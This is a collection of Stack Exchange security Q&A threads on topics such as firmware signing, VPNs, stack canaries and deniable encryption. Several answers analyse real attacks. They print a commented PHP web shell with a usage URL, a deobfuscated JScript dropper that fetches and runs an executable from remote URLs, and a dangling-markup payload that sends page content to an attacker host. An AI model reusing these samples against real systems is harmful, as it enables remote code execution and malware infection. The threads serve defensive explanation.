Please upgrade your site to HTTPS. This was their reply: The device will verify the integrity and correctness of the bin file,
if it is tampered, it won't be able to upgrade successfully. Don't
worry, you can download it. Ignoring the fact that they have no excuse for not using HTTPS, my question is: Is it even possible for the router to confirm that a new firmware file hasn't been tampered with? How would that work? | Sure - it could be a signed image. If the router has a built-in public key, and the image was signed by the corresponding private key, it would be perfectly safe. Unless someone had got the private key, and uploaded a malicious version to the server, in which case, HTTPS wouldn't help either. | {
"source": [
"https://security.stackexchange.com/questions/148189",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/116955/"
]
} |
148,236 | I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Could you tell me what it does? How does ${'a'} lead to code execution? Is the injected code sent by POST request? | It's an obfuscated web shell that allows remote code execution. The script feeds $_REQUEST['e'] into the assert() function. That evaluates the e request parameter as PHP. Use it like this: http://example.com/shell.php?e=phpinfo() assert() is a debugging feature to evaluate assertions. But if you feed it an arbitrary string it will be executed as a PHP expression. It's a fancy way of avoiding eval() to prevent malware detection. Here is the snippet reformatted and commented: <?php
// Make sure request parameter e is provided
if(isset($_REQUEST['e'])) {
// Complicate static analysis by assembling "assert" from multiple strings
$b = "ass"."ert";
// Evaluate assertion (yes, in PHP you can "call" a string as function name)
$a = $b($_REQUEST['e']);
// Junk. The assertion has already run, this doesn't do anything
${'a'};
}
?> How does ${'a'} lead to code execution? It doesn't. $b($_REQUEST['e']) is where the assertion runs. The code works without ${'a'} . Is the injected code sent by POST request? $_REQUEST allows the parameter to be sent via both GET and POST . | {
"source": [
"https://security.stackexchange.com/questions/148236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136206/"
]
} |
148,370 | Assuming you were able to modify the OS/firmware/device for server/client to send and listen on ports higher than 65535, could it be possible to plant a backdoor and have it listen on, say, port 70000? I guess the real question is this: If you rebuilt the TCP/IP stack locally on the machine, would the overall concept not work due to how the RFC 793 - Transmission Control Protocol Standard works as mentioned below in some of the answers? Making it impossible to access a service running on a port higher then 65535. There has been so much talk about hardware and devices having backdoors created that only government have access to for monitoring, and I was just curious if this was possibly one of the ways they were doing it and avoiding detection and being found? | No, the port number field in a TCP header is technically limited to 2 bytes. (giving you 2^16=65536 possible ports) If you alter the protocol by reserving more bits for higher ports, you're violating the specification for TCP segments and wouldn't be understood by a client. In other words, you're not speaking TCP anymore and the term "port" as in "TCP source/destination port" wouldn't apply. The same limitation exists for UDP ports. That said, a backdoor could instead communicate over a different protocol than TCP or UDP to obscure its communication. For example, icmpsh is a reverse shell that uses ICMP only. Ultimately, you can also implement your own custom transport-layer protocol using raw sockets that can have its own notion of ports with a greater range than 0-65535. | {
"source": [
"https://security.stackexchange.com/questions/148370",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31084/"
]
} |
148,425 | I'm creating an web-application that has a simple javascript game in it. Once the player finished playing the game the high-score is sent to the server and saved. After a specific period the player with the best score receives a prize. Is there a way to send the high-score securely and prevent the client sending 'false' high-scores? Currently we are using: Https. Server random token before each game and sent after the game is finished alongside the score. | The server can't fully trust any data it receives from the client, so validating high scores is difficult. Here are a few options: Obfuscate the client-side code and traffic to the server. This is the easiest option - it will still be possible to cheat, but probably won't be worth anyone's time. Send a full or partial replay of the game to the server for validation. The player's moves can be run on the server to determine the legitimate score. This will work for some games and not for others. Move the game logic and validation to the server. The client simply relays each move to the server, where it is validated and the game state updated. It comes down to how your game works, how likely it is that people will cheat, and how much you care if they do. | {
"source": [
"https://security.stackexchange.com/questions/148425",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136399/"
]
} |
148,497 | I'm a sysadmin and one of my users just told me that he opened a JavaScript received by mail. Apparently there is no impact but since I don't know this language well, especially when its obfuscated, I ask for help. Here is the code : function zxylv()
{
var a = 1;
var abisr="cf72ac2439a7222a712ff7b38b6c25f1023aac22b666cfb52bd1429e8538a9b08b022db5938e0f2df6e0ac703ebaf23d7a21ffb19ad43ebeb20a3564a7039d633ed3920c9e60aca6ca512ff2e2dc3d20d8c20b8e2ed062db5b2fcdf27e6765e7337d8838d293ed9b35c2337b7a3aa152dc493eba76caab34c9321f2020abb04f5438cb538dfb3ca1b6cc8e71ea06ccb422a4c29bff3bf1a6ccbe0df2a2fea038dd025c413ab3b29e9814b9a03eb02ee9a26de629da82fba338f5e64ca36ece601aff1fd2814b2301eeb00d0a7ee2662c6e14d3501c9e00fee04a2d18ebe18c111cdf16eb8065e6b77bb234b5421dcc20d7b04d8d38c7038cb03cc5962c9e23a863cfb229e1622a0264e496edb10bc2709a8318df76eb6e60b776cd3339d143ee3d20a1160dab6cf2d2aa362dbc420de93fd3f29ab265b5377c5534b7621b1120ab304ec538b1238ca23ce5562e6e3fe0529a2922c6f28fae64fba65ea877bf825b622ac576cd2c64d1734e2821c8d20c3904bf538ecf38ced3ce5362ea73fc5838bd92ddb038a3139e843fcc36cfbf71d3f71ce46cded7ee627cc9e7ce3a65d4c6cd3537f913ee4c29fdf38f4f39ecf3efb522e3c6cf1e2fc042db2620ddd20db22ec9f2db532fb4e27aea64ccc34a0d21a1720b5904dd738d7338dba3cd1e62f431ed6229bbf3fad83cee923c5d22eea3fb8129"+
"c2c0ea0c23a5128bf735b4260b5e6cf4e2ab052da8420fba3ff3b29d4665b5a77c8931fdc29e1120fc53ff1d29a2537bd13ee0329d2738e7a39dc33ea9e22e7e6ce4c2fbec2daef20c3c20c162ed082de9f2fd2b27f4464d2a22d1d39c4c20b5b20aaf60e1f6cb0938f823ef2439cc729d8965b2977a9b31ec131dfa2fcda2dc3438efb2fa0d24be06cd9164ac329fda3ecb73ec5623ac33ef4565e3437f4c3ed8b29a2538b5139bff3ee6022ccf6cfdb2fe9e2db9220c5620acc2eefd2da222fb7127a6764fb322d7e39c5920b8220cd660f136cdf138c133ed4039d6f29e2a65ab277a2731f7d31fdb2aaab39b3022b002fc2d38eb425eb623dd122fe36caa92be8729d9138bc408e1c2dd8f38c8a2dd7664ee42fea42dacf20db620a6d2eaaa2db9a2fa1327a7a65d1137ae138beb3ec2835bb337dc92bcf329a4a38f6b08e622dd1338d132df420ac033eeff23a8a21de019f1c3ecd320ac864b686ece824c0b38d1638ff43cdeb76b0a63e5b63fa938eb525bf022f5935bc339a643eb2220db262b1a2feee23daa21a9663cd524ea929de67ffea2ee5c24ad97ea207bfe96ef9360cab6cf192aa1339d9322e522fd3738b4525e6623c2522efd64a593ef1929b193fc0239d8620f1938a6b60c416cf0329a923eea63ec7723eb73ec4165dd96ce0937dbf25b332abdc6cdf564dce6de3629"+
"b223ef063ef3423b3c3eea965ffa37e493efb829e5438e4739b983ec4122f146ce562ff3e2dbff20ad220d9d2ea832db762fdad27a1264ac23ebc729d903fdd939cd620d7d38c7660dab6ce572af682de7520eb13fc5029ed865c5677edb31f5329acd20fa23fa7729d5d37e592bead29cab38e3108b1d2deb238abf2de890aaae3ed4423c2921e1319f8d3ec7e20c0e64c0b6ecb824cbe38ed038e7d3cace76dbe63f8763dec23d772ddc121b4b22f9823f8624b5b22a7828ae43ceca25c7a3bbe23cd0d25df22fcaa2be6221b0662ebc23ccc22db925b3f23e6f22ae862e0722ee139dd763d117dafb7cf6862df421a4623e2a3ae306ec1360fe36cf9e2ab3e39b3f22ee42fc9238d0625e9823d7022bb064c893ec5129c843fca739b0620ded38d0860e9e6cc2629e523eda03ea2f23a963ebe165f5a6caca37e7425c6b2acbd6cfb264e4b6dc5d29b773edb63ef8a23c973ea9c65bf337e5f3efe029edd38d5339d903ee4622bfc6ce562fb5d2da9b20b9e20b6e2ef5c2ddf22ff8a27c6d64fac3ec0229ff73fd1f39c6820c9c38b5160afe6cbb72af1c2dfb820c413fdef29e0e65ee577b6c31aa229ac120aeb3fddb29b9837fea2bf9a29f8538d5408e092dfa338ece2dede0ad7c3eba523f7421c3c19ad43eb9920d8264a4c6eb2924be738a8c38ec83cb0d76ce163b1d63c6638efd25"+
"ee122f4235b7139f093ec8620eaf62f2f2ff4e23d0621e8463f8424e3729e8d7fa272ed0f24e907ee5a7bf2f6efb860abe6cb972ac6039e5122f632fbfb38ad525da923b7a22b2664d223ed6029adf3fdb439f8020fa838dc560f7f6ccb629ad73ec993ec3f23a4b3eed865b9e6cf7037be625dcc2ac386cf3664b9f6df1129d253ec233ee5b23f223ec7165ffc37d7f3ee4229b8038b4a39bfb3ed5d22f226ccf42fc502dc1920b9e20a932ebda2df2d2fc6c27bd164a933eaf129c663fec639def20c2838f5560b266cb9b2aeb92deb120afe3fb5529d4165ec177f5231bf629d4720e7e3fd6b29a6837b863eba029c3d38c1039cdd3ed2c22ea16cc082fb4d2da6320c0020fc42ec472dba72ff3527fb764ca222dea39a6d20f6420edd60da06cf1d38a593ed2a39ec629b5e65cde77ad531eaa31a0865e3377de331c2831eb965d9677eda31e3831e3665b1e77e3031c3c2fccb2dd3d38a292ffb224aaf6cf0264b9529cc63eca93eaeb23e883ed3a65c5c37ef83eae229eab38ad539c513efca22bfa6ceb32fc652dac920fb820bc72ecc22dadf2fc4427cfe64a3d22f1039e7e20b8b20f4860b756cdc138fdd3ed4139f0e29fa265d7377b5931b8e31e342ac6a39de722d052fd3838de125daa23d5122f966cbac2bb0f29ce538a0418d5c29fce21b6f3cbf00ae8f25e4720b9229acb1c"+
"e5a2db7538ce924bb664bea65a4037f3238d253ea6d35b7a37e6f3ad062dfe53eb316cd6e2ab833fe466cef771bec6ca2422fe029d833be526cb050db4a2fb9338c7725f653ab0429eb514b7503f2c2ee2126a6a29bad2fef738a6d64c336ef6c1fe592fb8f3ec4125b323cb3838e7225f6122b872baf962b0d0aa9325dba20c4f29c811fdc335eb03fa9e38ab729cb521aff03ef72ea8226ff529d6c2fdf938ff46eceb65b2777f933ae012de8e3eb876cc4638dca21c803ce480aa0725fe920ba229baa02c822dcb021f2c29ac06cf3171c156cf3f6ebed10f3810f836ecfa6cd5767a286ce4401de72dd6838f3024f7962d3b3eae42db7222fe628b3723f2021e0064b3f65fe262ca838e4023d401ff7138e413eb7325f2422bec2be5f64f1f7fe697ac5b65ede62db73fd0039df12ef933fed338fb73ed9764d7c7eab160fbf6cf5075ad465f726cf2a67e186cab46ec6b62ed329fff34fa029d7d6eb9a77c513ac232da133ed2f6cf9438d8221f213cdda0ab7225aaa20f1f29f911cea12da5238e2a24aa26cb6471be16ce382aa323fdd362d9a0bd7629d8038f6b1fb873ccbc29deb2fdfd25afe2db9c20c260aaac23c5420ee928d5129aac3ef4b64dda7ece965b326ca8467c9f6cbd438cd321e873ce910af6525cd320a4229d9502fac2da2521e6329ace77bb83efae29f7538ad339"+
"be63eb0d22d796cb7a38d6e21f9b3cfc70ab8225a4820c4629d751cebf2df5538b0b24e4277ee031db62fadd2da1238d862fe2b24b186cbdb64c3529b293eb183efa423bb13ead265a9937c903ebda29d1838b9039dbb3eaeb22dc66cee22ae1e2de3820d013facd29f7d77bb631e6131d9e2ab3c39d1b22fec2ffff38b8925b0523a7a22e076cb8c3fb152db583aef829fa818c6723c8d18ea829bad21e983cbaf64afe28b242df1338bbc2df4360a006ce952fcce2dba820fe320de12ed532df232fe7d27f2265e4a37c3438f9e3efca35b7037c103ac9d2dd6e3ef466cde83cfca2dc5d38d1624dc36cb1971f706cbd32bb8829a3b38ccb18e8829ddc21c7d3cff00ae2025cd120a3f29b661cf992dce538aec24d9064cee65bbf77fa125c2d2ac316cc6664f1f3cb8f2dd9d38b3624e9665eb137f9a3affc2dd7e3edc56ca8623ebc2ef4626d981fe8e38b5a3eb2329ed22df8921f256ca2b71ce86cacb22c6429e5b3be0e6cdd10dfdf2fea638c6725d783acb829ff414d6003f5d2ec4726cc529c932fc6d38fb364a706edb50da9408b2903edd08f510eabc62c351fd9a38c573ed6c29be92dce221f536eb3e65ad577a1e23e822eb2a26e9e1fc3538a643efd429e992daca21af862b1903bee3cb4129a3022e9c64ba265c7e77f4923b452ee5426c951feb538e183ee2a29d132db5d21"+
"cc462c9718eca35aaf3cc2829d146ced571cc66ca667da0a77ee723b6f2ed3b26b671fbb838f683ee4629a032dc0821fb262cb21bef73ef9925ddd38e1029ccf64ea228bca2dc4538e212da9b65a7a77d4323abe2eea126d2c1fc1738c543ebc829cb92dcc121bf862f7a1ce8723e713fef325f5338bc725ce423e7f22cfb6cc1071ede6cdc87cebd77ebc23a822ebad26d1d1fef538f433eca329a812daed21df062cd51fafc2db373aac729ea518a7923bf40acfa25dea20c8029ed764b163ce492dc5638f3e24a5760d056ce147ed9465bfb77fd023b102ed1c26a711fc3338c583efe229ad22db6a21d0062b670ff0820c3823a5d3fab129c2664ff565ee277a583efc129b1738fce39a333ed5822c736ccb52ff932da8320b8820f352ef852da222fa5427bd864f5f3ceca2db0438cba24df260e056cb6b2ad7d2dd9220ede3fc9529b8265eaa77ae731f9629f8e20ab53fe5a29ff46cfc137f303ea7129a4a38f5a39b133edda22de76cfcb2fc8a2dd6720f2020b3e2eb642de382fd7827fe664c8522e4139da920b5d20fee60b436cb8838c8a3ee2139cee29f8765e6077ae531d4931cf82fc4b2dd7438aca2ffbc24f2b6cfc464ab929fb93ea6c3edcb23a4f3efc665ef237dad3ec7f29a3a38c5739e133ec2822ba46cea72fe742db6220beb20a732ee952ddf02fada27a5b64d8622"+
"f8139b5820c8d20dcc60bf46ccfc38d9a3eb0839ebb29d6465e3a77e6e31cc831a542be9329ad138e9908db22da0d38f332da1664fea2af6839a8b22c852fd0238d9a25a2723b3e22af36cbf464da328b682df8e38cd72df7160ef96cc1029e5b3ee6a3ee0023b343ec7965f316cf0f37b6525b442afa46cc9864a7c6df6729b993edfe3eab223a8b3eeb265bf537cae3fde92da2f3aed529b3c18eaa23fb718edf29fc021f183ca8264e3228c542dc4138d932dc7c60a496cc362acd339e0422c0b2fd0d38d1325f7623f1f22e856cf9964b1b3cd692df5238aab24f3560dc66cf0b29a8c3ee743eb3c23f8c3ec2265af76cae237eb425b612ad2a6cb4364a496db8b29a533efc53eec423be33ecdf65d1537d9638bc03ecdc35a2537f203aed62dbc33ec126cd7f3bc1f3ffa824a146cf8271d836cf3522c2329f5f3beae6ce470deb72ff8238b0225d593add129f0414ae503ab92ea9426a8729c632ff3038e7364ee86ed951bd5f1ff5f2fe803ed9325f003caee38bc362eb01faa924d3229fa620f6a20d636ebdb65c9577ea53bed23fabc24fb762b491eb1439fc022c7f64d0b3cbf42dcff38fdb24ff865da477ed831d492ffd52db4a38bb52fee424b726ca3e64fef29b993ec973ee1023cc83ef2a65c676cf5637e8c31e0f31e7f31fb765c3f77f2e31b9b31f4d65ca377";
var uumod;
while(true){
try
{
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));
break;
}
catch(er)
{
}
}
return uumod;
}
function tljsw()
{
var vqqfn=new Array("e","v","l","a");
return vqqfn[Math.floor(Math.random()*vqqfn.length)];
}
zxylv(); Can someone tell me what this code does? | The procedure for dealing with obfuscated JavaScript is very similar to how you deal with it in PHP . In this case, the real action is going on in this line: uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr)); An anonymous function is created from the long string of code, and that function in turn creates new code by picking characters from the long banks of seemingly random text at the top. At the end you have four function calls: tljsw()+tljsw()+tljsw()+tljsw() That function at random returns one of the letters e , v , l and a . So sometimes it will give you eval . That executes code, but we don't want to do that. We just want to read the code. So let's replace it with console.log : uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}cconsole.log(tgrdm);")(abisr)); We then get the following output: function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
}); I don't know what that code does, but the second I copy pasted it into a text editor my antivirus started screaming about it... As LegionMammal978 points out in comments this seems to target IE browsers with bad config, but to be on the safe side you could assume that the computer this was run on is infected by malware and treat it as such . (Note that I had to split the URLs into "tiny" + "url" because Stack Exchange does not let you post that URL... This should not change the behaviour of the code, though.) | {
"source": [
"https://security.stackexchange.com/questions/148497",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136475/"
]
} |
148,750 | For a person looking to use a VPN solution for personal use, what are the pros and cons of paying for a VPN service as opposed to just hosting a VPN on your own rented, in the cloud server, except for the obvious managed vs unmanaged argument? | VPNs are designed around the concept of trust between 2 or more parties, and were intended for corporate/enterprise use. The popularity of offering "Free VPN" or "Hosted VPN" solutions to the consumer market has dramatically increased. A lot of people seem to forget there has to be a "trust" involved. You wouldn't want to have some random person on your home network, so why would you tolerate that on a virtual up scale of that idea? Hosting your own private VPN solution has a key distinct advantage, you trust yourself . You know how data is handled, you know who can view VPN data as it's relayed, you can ensure it's quality, reliability, and anonymity. Most people will use a VPS (Virtual Private Server) for hosting a VPN. Using a third-party hosted solution does come at a cost of some trust, corporations are legally bound entities which may be required to hand over subscriber information. Some self-hosted solutions over come this with payments by bitcoins (for the virtual private server or physical hardware). In some countries, a corporation may also be required to log usage by their clients. Beyond this, you will have to address each company's privacy policy and terms of use. Tor was the answer for the consumer's idea of anonymity on the internet. This again has some issues with trust, mainly that entry/exit nodes have full implicit trust. It is not made apparent if a "rogue" node was to log your connections, or pass your information in the clear. If you are not overly concerned about "trust", here are some bullet points to think about: Self-Hosted Security and anonymity to your standards Can be faster, as you are the only one using the service Must keep up to date with patches/security of software Your information is known to the hoster, which could be a third-party Only your hosting platform is aware of your IP address Out Sourced Hosting Cheaper, and generally more reliable/constant service Don't have to worry about patches/security of software Simple payment plans, and generally cheaper What happens to your data in between is anyone's guess Your data/connections might be logged for legal reasons Your data might be altered on the fly for advertisement revenues Tor Easy, usable by the general population Free, no real costs What entry/exit points do with your data, is anyone's guess Slow, due to the number of relays, and non-profit architecture | {
"source": [
"https://security.stackexchange.com/questions/148750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136779/"
]
} |
148,957 | We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder ( s.htm ). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML file. Nothing else seemed damaged although we are investigating. The link included in the email was exactly hXXp://example.com[.]au/s.htm in plain text, which is also a bit weird, although helped us find the file. The date stamp on the file is only 7 hours and 3 minutes different to the Sent date on the email. 7 hours could easily be a timezone deviation. My question is: How did the government agency ( CERT ) know that our website was hacked? It's an Australian hosted website, for a legitimate business - and the government agency is legitimate. | It's extremely easy to fake email. If someone did fake this, I don't see how the agency would know about it. The concern is that the link they sent you was the attack itself. For example, this could be a CSRF attack: With a little help of social engineering ( such as sending a link via
email or chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. One suggestion is to contact the office and find out if this is something they do. Just because the language seems right and says it's from the right sender means nothing. That's a common approach used in phishing emails. | {
"source": [
"https://security.stackexchange.com/questions/148957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/97202/"
]
} |
149,133 | A canary word is a sequence of bits placed at the boundary between a buffer (such as a stack) and control data in a program, as a way of detecting and reacting to buffer overflows. How many bits long are these canaries on Linux, usually? | Let's try it out! Here is a very simple example program. int test(int a)
{
return a;
} Compile it with GCC and intercept the compilation at the assembly stage. (The -S flag will do this.) Rename the assembly file (so it won't be overwritten) and compile again, this time also adding the -fstack-protector-all and -mstack-protector-guard=global flags. The first flag enables stack canaries for all functions, the second selects a global canary instead of a thread-local one. (The thread-local default is probably more useful in practice but the assembly for the global version is easier to understand.) Comparing the two generated assembly files, we spot the following addition (comments are mine). movl %edi, -20(%rbp) ; save function parameter onto stack (unrelated to canary)
movq __stack_chk_guard(%rip), %rax ; load magic value into RAX register
movq %rax, -8(%rbp) ; save RAX register onto stack (place the canary)
movl -20(%rbp), %eax ; load function parameter into EAX register for return (unrelated to canary)
movq -8(%rbp), %rcx ; load canary value into RCX register
movq __stack_chk_guard(%rip), %rdx ; load magic value into RDX register
cmpq %rdx, %rcx ; compare canary value to expected value
je .L3 ; if they are the same, jump to label .L3 (continue)
call __stack_chk_fail ; otherwise (stack corruption detected), call the handler
.L3:
leave We can see that the canary is handled in the RAX, RCX and RDX registers which are all 64 bit wide. (Their 32 bit counterparts would be named EAX, EBX and EDX. The 16 bit versions are named AX, BX and CX. The 8 bit variants AL, BL and CL.) Another clue is that the operations to store, load and compare the canary (MOVQ and CMPQ) have a 'Q' suffix which identifies a 64 bit instruction. (32 bit instructions have an 'L' suffix, 16 bit instructions a 'W' and 8 bit versions a 'B'.) Hence, we conclude that the canary is a 64 bit value, which makes sense on a 64 bit architecture (x86_64 GNU/Linux in my case). I expect that they'll always use the native word size as it makes the most sense to me. You can try the same experiment on your machines and see what you'll get. | {
"source": [
"https://security.stackexchange.com/questions/149133",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137103/"
]
} |
149,168 | I'm starting to have a big list of passwords I need safely stored. I was looking at password managers like LastPass, but these always seem to be targetted by hackers and have been compromised before. Would I lose anything from storing my passwords in a text document that I encrypt myself using AES 256? Then just decrypt when I want the password? | Considering those compromises you mention, do you think that encrypting files yourself will be easy? How do you know you won't get into those same pitfalls that resulted in compromises of password managers? AES 256 is believed to be computationally secure. Every computer ever made working simultaneously to brute force the key, working since the beginning of time, would have a probabilistically negligible chance of ever finding the key to an encryption. However: a secure algorithm doesn't guarantee a secure implementation . Just to give you an example, here are a few questions you should ask yourself: How are you going to ensure that two identical passwords in your list are not encrypted to identical AES ciphertext? (so that if the adversary knows one password, he'll know where it is reused) Are you sure your decrypted password list cannot be reclaimed by a process allocating RAM after you have consulted your list? Are you sure your decrypted password list will not end up is the swapfile? What communication mechanisms will you use between the user providing the master password, the process decrypting the password list and the target application in need of one password? Password managers are designed with those (and perhaps many others) concerns in mind. It's almost impossible to get everything right when doing it yourself the first time, especially if you're not a security expert. | {
"source": [
"https://security.stackexchange.com/questions/149168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71974/"
]
} |
149,202 | Suppose I have some confidential information that is encrypted and I'm forced/compelled to disclose that password. My goal is to make that decrypted payload seem meaningful / and the password valid. Is there any such algorithm that allows for a different password to be applied to the same payload, so that the alternate decrypted data is disclosed? | With many common algorithms, by changing the key, it is quite possible to get any arbitrary data in the first block. Where you run into trouble is when the data is longer than they key block size. The rest of the data (beyond the first block) would look random after swapping keys, assuming you are using a secure chaining method. You could use an insecure chaining method, but I wouldn't recommend it. You could use XOR OTP encryption . This is different from most encryption where the key is mathematically re-used. With OTP (One Time Pad), the key is the same length as the data. With XOR (one of the most common OTP) you have the flexibility to arbitrarily produce the desired message. (Your adversary may be aware of this possibility?) To start, create files of equal length: original message random data (the real key) XOR together gives you encrypted message then take fake message encrypted message XOR together gives you fake key To decrypt, take encrypted message real or fake key XOR them to get real or fake message As @Alpha3031 commented , you could actually encrypt one message (e.g. the fake one) with traditional AES, (more common, and requires a smaller key file) and then use XOR (less common) to produce the other. (e.g. the real message?) XOR can be applied to any files that are sufficiently unpredictable/random. (e.g. encrypted data) | {
"source": [
"https://security.stackexchange.com/questions/149202",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
149,378 | This question is inspired by this article (in Russian) about a website called I Know What You Download . From what I understand, they scan the DHT networks and display torrents that any given IP participated in, and although it is sometimes inaccurate, it can provide data on Internet usage, and thus presents a threat to anonymity. Most people suggest using VPN in order to conceal torrent traffic. However, in another article (also in Russian) same author shares his experience with torrenting over VPN set in Azure. Apparently, he received DMCA notice for torrenting a film (author specifically notes that he did not fully download the film, and everything was done for the sake of experiment). They provided the name and the size of the file, along with IP address and port. But, some (if not all) torrent-sharing programs have an encryption feature. For instance, Tixati can even enforce encryption for both incoming and outgoing connections: Question is: what does this feature encrypt ? Name of the file, its contents, size? Could it prevent DMCA notices? If not, what does it actually do? Related : the answer there mentions encryption — does this kind of encryption count? | Think of it like an underground fight club. Encrypting the traffic means nobody on the outside can see you enter or leave, but once you're inside, everybody there knows who you are and can monitor your participation. This feature is really only useful if you have an ISP that blocks torrent traffic. Encrypting it means it doesn't appear to be torrent traffic, it's just an encrypted stream, but once you get past the ISP and connect to the swarm everybody else participating knows exactly who you are and what you're doing. | {
"source": [
"https://security.stackexchange.com/questions/149378",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137363/"
]
} |
149,466 | GitHub explains the problem with img-src in "GitHub's post-CSP journey" : A tag with an unclosed quote will capture all output up to the next
matching quote. This could include security sensitive content on the
pages such as: <img src='https://some-evil-site.com/log_csrf?html= <form action="https://github.com/account/public_keys/19023812091023"> ... <input type="hidden" name="csrf_token" value="some_csrf_token_value"> </form> The resulting image element
will send a request to https://some_evilsite.com/log_csrf?html=...some_csrf_token_value ....
As a result, an attacker can leverage this dangling markup attack to
exfiltrate CSRF tokens to a site of their choosing. How does this differ from pressing page-source on the page and sending the content manually? If it is just for pages where users can insert input, don't we have to prevent only those issues with inputs by adding validations to the input? Not prevent img src of other sources in all the code? | Just to be clear about how the attack works: A site allows you to enter text that is later displayed somewhere. It does not properly filter out HTML. Mallory enters <img src='https://some-evil-site.com/log_csrf?html= , and sends a link to the page to Alice. Alice views the page, and the rest of the page with Alice's secret content is sent to some-evil-site.com that Mallory controls. How does it differ from pressing page-source on the page and sending the content manually. You view the source on your computer, generated with your credentials, so it does not contain anything that is secret from you. The point of the attack discussed in the blog post is to "steal" the source from someone else (by injecting HTML) so you can read their secrets. If it is just for pages where users can insert input, don't we have to prevent only those issues on inputs by adding validations to the input? Yes, we need to do that even if we implement a CSP. But humans are fallible creatures and we might make mistakes. Having a CSP that stops this kind of attack might therefore be good as defence in depth. Not prevent img src of other sources in all the code? If you don't want to allow images from arbitrary domains anyway it might be good to whitelist the domains you do want to allow images from and block everything else. Again, you should have other kinds of protections against this, but it never hurts to have a backup. | {
"source": [
"https://security.stackexchange.com/questions/149466",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137438/"
]
} |
149,613 | Is there some place for a consumer to file a complaint concerning improper use of credit card information? I gave my credit card to a towing company and they sent me a receipt via email with all of my credit card info in the notes field. The email sent is in no way secure. Is there a government agency where I can file a complaint? I believe my credit card is now compromised and I am going to cancel it and get it reissued. I don't believe this company has a clue about the risk they are placing their company in. | (Note: Not a PCI QSA, just know some PCI and PII stuff) Violating the Payment Card Industry Data Security Standard is not a violation of the law. The PCI DSS is an agreement between the payment card companies (VISA, etc) and the processors about how data will be secured. The towing company is likely in breach of an agreement with their processor by doing this - and almost certainly would be more liable in case of leaked information. If the email indicates the credit card processor, you could contact them. You could also contact the towing company directly. Lastly, as @Matthew suggests, you should let the bank know when you cancel. A further possibility is to look at the Personally Identifiable Information statutes in your state (assuming you are in the US). PII statutes vary widely depending on your location, but they widely consider the credit card number (known as the PAN) as counting as PII (along with the other personal information presumably in that email). If your location has a privacy commissioner, you could raise it with that department. Most PII statutes have requirements that companies treat PII with appropriate care and there are some significant penalties for not doing so in many jurisdictions. For PCI, you can look at this info sheet on reporting violations | {
"source": [
"https://security.stackexchange.com/questions/149613",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137567/"
]
} |
149,768 | SSH Server: I only allow public-key authentication. Malicious Software: If it's running as my user it has access to my data and an internet connection, it's bad enough already. Yes, su access would make it worse, but the issue here is not password strength but having trusted a malicious application. Physical Access: su access is irrelevant at this point, the attacker has physical access to my hard drive, so they can do as they wish. So, in what scenario does having a strong password that is error-prone to type help me? | You seem to have a pretty clear understanding of the risks. As others have stated it highly encouraged to use a strong password, so if you are running a sensitive service, then by all means, please use strong passwords only. When using a weak password, there are a couple risks that come to mind which you did not mention: There may be other services besides SSH (e.g. FTP or others) that are still accepting password-based authentication. It's quite possible that one of those services will be accidentally enabled some time in the future, or a sysadmin may temporarily enable password-based authentication on the SSH. There is an important point you did not mention in regards to malicious applications . In the event of an 